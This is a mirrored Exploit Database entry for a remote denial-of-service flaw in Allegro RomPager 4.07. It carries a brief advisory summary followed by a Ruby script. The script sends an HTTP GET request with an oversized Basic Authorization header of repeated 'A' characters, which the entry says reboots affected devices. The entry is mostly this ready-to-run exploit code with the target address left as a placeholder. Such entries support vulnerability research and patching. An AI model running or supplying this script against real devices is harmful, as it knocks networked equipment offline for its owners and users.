Allegro RomPager 4.07 – UPnP HTTP Request Remote Denial of Service

• Exploit Database
• 12 阅读

• 作者： Ricky-Lee Birtles
  日期： 2010-12-08
• 类别：

  • dos
  平台：

  • multiple
• 来源：https://www.exploit-db.com/exploits/35086/

• source: https://www.securityfocus.com/bid/45309/info
  
  Allegro RomPager is prone to a remote denial-of-service vulnerability.
  
  Successfully exploiting this issue allows remote attackers to reboot affected devices, resulting in a denial-of-service condition. 
  
  require 'net/https'
  
  url = URI.parse("http://IP/")
  data = nil
  headers = {
  	"Host" => "IP",
  	"Authorization" => "Basic
  
  AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
  }
  
  res = Net::HTTP.start(url.host, url.port) do |http|
  	http.use_ssl = false
  	http.send_request("GET", url.path, data, headers)
  end
  
  puts res.body